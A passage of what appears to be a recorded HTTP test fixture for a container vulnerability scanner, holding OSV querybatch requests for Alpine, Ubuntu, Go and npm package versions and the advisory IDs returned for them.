{}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-11187", "modified": "2026-01-30T11:15:53.799925Z" }, { "id": "ALPINE-CVE-2025-15467", "modified": "2026-02-26T11:16:44.405477Z" }, { "id": "ALPINE-CVE-2025-15468", "modified": "2026-01-30T11:17:10.087231Z" }, { "id": "ALPINE-CVE-2025-15469", "modified": 
"2026-01-30T11:16:52.287694Z" }, { "id": "ALPINE-CVE-2025-66199", "modified": "2026-01-30T11:16:38.617961Z" }, { "id": "ALPINE-CVE-2025-68160", "modified": "2026-02-08T14:17:20.369697Z" }, { "id": "ALPINE-CVE-2025-69418", "modified": "2026-02-08T14:17:22.909725Z" }, { "id": "ALPINE-CVE-2025-69419", "modified": "2026-02-08T14:17:23.481787Z" }, { "id": "ALPINE-CVE-2025-69420", "modified": "2026-02-08T14:17:16.244540Z" }, { "id": "ALPINE-CVE-2025-69421", "modified": "2026-02-08T14:17:06.852172Z" }, { "id": "ALPINE-CVE-2026-22795", "modified": "2026-02-08T14:17:23.817021Z" }, { "id": "ALPINE-CVE-2026-22796", "modified": "2026-02-08T14:17:23.708503Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-11187", "modified": "2026-01-30T11:15:53.799925Z" }, { "id": "ALPINE-CVE-2025-15467", "modified": "2026-02-26T11:16:44.405477Z" }, { "id": "ALPINE-CVE-2025-15468", "modified": "2026-01-30T11:17:10.087231Z" }, { "id": "ALPINE-CVE-2025-15469", "modified": "2026-01-30T11:16:52.287694Z" }, { "id": "ALPINE-CVE-2025-66199", "modified": "2026-01-30T11:16:38.617961Z" }, { "id": "ALPINE-CVE-2025-68160", "modified": "2026-02-08T14:17:20.369697Z" }, { "id": "ALPINE-CVE-2025-69418", "modified": "2026-02-08T14:17:22.909725Z" }, { "id": "ALPINE-CVE-2025-69419", "modified": "2026-02-08T14:17:23.481787Z" }, { "id": "ALPINE-CVE-2025-69420", "modified": "2026-02-08T14:17:16.244540Z" }, { "id": "ALPINE-CVE-2025-69421", "modified": "2026-02-08T14:17:06.852172Z" }, { "id": "ALPINE-CVE-2026-22795", "modified": "2026-02-08T14:17:23.817021Z" }, { "id": "ALPINE-CVE-2026-22796", "modified": "2026-02-08T14:17:23.708503Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "2365" Content-Type: - application/json status: 200 OK code: 200 duration: 0s 
- request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2279 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.20", "name": "alpine-baselayout" }, "version": "3.6.5-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "alpine-baselayout" }, "version": "3.6.5-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "apk-tools" }, "version": "2.14.4-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "busybox" }, "version": "1.36.1-r29" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "busybox" }, "version": "1.36.1-r29" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "ca-certificates" }, "version": "20240226-r0" }, { "package": { "ecosystem": "Go", "name": "github.com/BurntSushi/toml" }, "version": "1.4.0" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.22.4" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "openssl" }, "version": "3.3.1-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "openssl" }, "version": "3.3.1-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "musl" }, "version": "1.2.5-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "musl" }, "version": "1.2.5-r0" }, { "package": { "ecosystem": "Go", "name": "ptf" }, "version": "(devel)" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "pax-utils" }, "version": "1.3.7-r2" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "busybox" }, "version": "1.36.1-r29" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "zlib" }, "version": "1.3.1-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage_JSONFormat/scanning_image_with_go_binary url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 5308 body: | { "results": [ {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", 
"modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, { "vulns": [ { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": 
"GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-12797", "modified": "2025-12-03T22:55:03.634026Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-15467", "modified": "2026-02-26T11:16:44.405477Z" }, { "id": "ALPINE-CVE-2025-15468", "modified": "2026-01-30T11:17:10.087231Z" }, { "id": "ALPINE-CVE-2025-66199", "modified": "2026-01-30T11:16:38.617961Z" }, { "id": "ALPINE-CVE-2025-68160", "modified": "2026-02-08T14:17:20.369697Z" }, { "id": "ALPINE-CVE-2025-69418", "modified": "2026-02-08T14:17:22.909725Z" }, { "id": "ALPINE-CVE-2025-69419", "modified": "2026-02-08T14:17:23.481787Z" }, { "id": "ALPINE-CVE-2025-69420", "modified": "2026-02-08T14:17:16.244540Z" }, { "id": "ALPINE-CVE-2025-69421", "modified": "2026-02-08T14:17:06.852172Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9231", "modified": "2025-12-03T23:00:26.184987Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" }, { "id": "ALPINE-CVE-2026-22795", "modified": "2026-02-08T14:17:23.817021Z" }, { "id": "ALPINE-CVE-2026-22796", "modified": "2026-02-08T14:17:23.708503Z" } ] }, { "vulns": [ { "id": 
"ALPINE-CVE-2024-12797", "modified": "2025-12-03T22:55:03.634026Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-15467", "modified": "2026-02-26T11:16:44.405477Z" }, { "id": "ALPINE-CVE-2025-15468", "modified": "2026-01-30T11:17:10.087231Z" }, { "id": "ALPINE-CVE-2025-66199", "modified": "2026-01-30T11:16:38.617961Z" }, { "id": "ALPINE-CVE-2025-68160", "modified": "2026-02-08T14:17:20.369697Z" }, { "id": "ALPINE-CVE-2025-69418", "modified": "2026-02-08T14:17:22.909725Z" }, { "id": "ALPINE-CVE-2025-69419", "modified": "2026-02-08T14:17:23.481787Z" }, { "id": "ALPINE-CVE-2025-69420", "modified": "2026-02-08T14:17:16.244540Z" }, { "id": "ALPINE-CVE-2025-69421", "modified": "2026-02-08T14:17:06.852172Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9231", "modified": "2025-12-03T23:00:26.184987Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" }, { "id": "ALPINE-CVE-2026-22795", "modified": "2026-02-08T14:17:23.817021Z" }, { "id": "ALPINE-CVE-2026-22796", "modified": "2026-02-08T14:17:23.708503Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {} ] } headers: Content-Length: - "5308" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { 
"package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage_JSONFormat/scanning_insecure_alpine_image_with_detector_preset url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 136 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "136" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": 
"Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage_JSONFormat/scanning_insecure_alpine_image_with_specific_detector_enabled url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 136 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "136" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2701 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.19", "name": 
"alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "apk-tools" }, "version": "2.14.0-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "ca-certificates" }, "version": "20230506-r0" }, { "package": { "ecosystem": "npm", "name": "cryo" }, "version": "0.0.6" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "libc-dev" }, "version": "0.7.2-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "npm", "name": "minimist" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "mkdirp" }, "version": "0.5.0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "pax-utils" }, "version": "1.3.7-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "zlib" }, "version": "1.3.1-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage_JSONFormat/scanning_node_modules_using_npm_with_some_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: 
HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2922 body: | { "results": [ {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, { "vulns": [ { "id": "GHSA-38f5-ghc2-fcmv", "modified": "2023-11-08T04:00:20.055238Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": 
"ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, { "vulns": [ { "id": "GHSA-vh95-rmgr-6w4m", "modified": "2026-03-13T22:11:31.390433Z" }, { "id": "GHSA-xvch-5gv4-984h", "modified": "2026-03-13T22:11:59.523514Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {} ] } headers: Content-Length: - "2922" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 14065 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Ubuntu:22.04", "name": "adduser" }, "version": "3.118ubuntu5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-files" }, "version": "12ubuntu4.7" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-passwd" }, "version": "3.5.52build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bash" }, "version": "5.1-6ubuntu1.1" }, { "package": { 
"ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "1:2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "coreutils" }, "version": "8.32-4.1ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dash" }, "version": "0.5.11+git20210903+057cd650a4ed-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debconf" }, "version": "1.5.79ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debianutils" }, "version": "5.5-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "diffutils" }, "version": "1:3.8-0ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dpkg" }, "version": "1.21.1ubuntu2.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "findutils" }, "version": "4.8.0-1ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnupg2" }, "version": "2.2.27-3ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "grep" }, "version": "3.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gzip" }, "version": "1.10-4ubuntu4.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "hostname" }, "version": "3.23ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "init-system-helpers" }, "version": "1.62" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "acl" }, "version": "2.3.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "attr" }, "version": "1:2.5.1-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": 
"2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bzip2" }, "version": "1.0.8-5build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap-ng" }, "version": "0.7.9-2.2build3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap2" }, "version": "1:2.44-1ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libxcrypt" }, "version": "1:4.4.27-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.8ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "cdebconf" }, "version": "0.261ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libffi" }, "version": "3.4.2-4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgcrypt20" }, "version": "1.9.4-3ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gmp" }, "version": "2:6.2.1+dfsg-3ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnutls28" }, "version": "3.7.3-4ubuntu1.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgpg-error" }, "version": "1.43-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libidn2" }, "version": "2.3.2-2build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": 
"Ubuntu:22.04", "name": "keyutils" }, "version": "1.6.1-2ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lz4" }, "version": "1.9.3-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xz-utils" }, "version": "5.2.5-2ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libnsl" }, "version": "1.3.0-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "p11-kit" }, "version": "0.24.0-6build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre2" }, "version": "10.39-3ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre3" }, "version": "2:8.39-13ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libseccomp" }, "version": "2.5.3-2ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libselinux" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, 
